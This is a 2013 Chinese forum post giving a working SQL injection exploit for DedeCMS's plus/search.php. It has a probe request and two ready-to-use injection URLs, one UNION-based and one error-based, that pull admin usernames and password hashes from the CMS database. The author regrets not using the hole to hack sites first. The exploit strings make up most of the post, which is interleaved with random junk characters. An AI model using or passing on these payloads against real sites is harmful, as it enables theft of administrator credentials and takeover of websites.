中国网络渗透测试联盟

标题: [通杀]dedecms plus/search.php 注入漏洞利用EXP [打印本页]

作者: admin    时间: 2013-1-21 08:45
标题: [通杀]dedecms plus/search.php 注入漏洞利用EXP
转载不加作者名的没JJ( c" N2 @* Y( a5 ]1 @* ]/ K5 G

3 b" q2 k9 q7 S" H) |5 E4 `哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。' @9 x* C. T2 S. U" l7 l

9 w3 Q/ a+ Q4 D* x& W; n8 t0 u既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
; E# e2 u$ e1 v% }' V- J
8 i* M9 |" }+ b5 }" u& j我一般是这样测试的:1 ^% f1 \9 U" Z6 C

# d. R9 k+ o5 W! H提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a" ~: t+ `( ^; G) T
8 L' C2 _5 c! u0 R+ L- ^
转载不加作者名的没JJ
& M5 ~% x/ l8 a" S+ c  v2 L" G) ^* }
作者:鬼哥, }- F1 l' u% g# Q/ A+ w9 w0 K

# c, c2 a7 K9 M
: j2 a! H( a; ^0 K. [# J0 P+ Z1 i$ w1 k  ]! }5 p1 M6 Q
看结果如果提示
5 {) S3 r* C5 g$ b6 X, @% C1 T" ]5 [! V9 q! f2 X' e, \* Y, K4 q" d  G
Safe Alert: Request Error step 2 !8 ^9 T* I3 ^: J0 }

3 e8 I# a! k. M, k) r, S那么直接用下面的exp+ t0 R) a4 R* X; W; R% e% v9 l

5 m" H1 a# y9 ]* bxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
2 m6 D9 N/ I" t% H% q# a) z+ H5 ^+ S
& z& A* h# t* s5 R6 f+ s0 o2 C4 m1 p- B) c. S6 y3 A9 t
看结果如果提示
$ [& S2 P' L- K, D8 Q8 J. a2 r2 U" O! U; Z0 h  j2 Y
Safe Alert: Request Error step 1 !
& D/ L8 d! ~% d; }, o6 J1 M9 F. O4 X& n+ t$ M  k/ ~( H
那么直接用下面的exp9 p5 a4 S7 ?+ h. ?6 ]
: e$ R/ H0 {  R- |1 N6 i
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a9 A, `" p+ g2 R7 u
5 E2 w0 {2 C- J6 {9 {
, {0 `8 G2 Z; j" M
如果正常显示证明漏洞不存在了。! Z% @$ V; e1 L& [  |1 q

5 l" M2 R- ~0 i' D) \$ g, V/ s转载不加作者名的没JJ




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2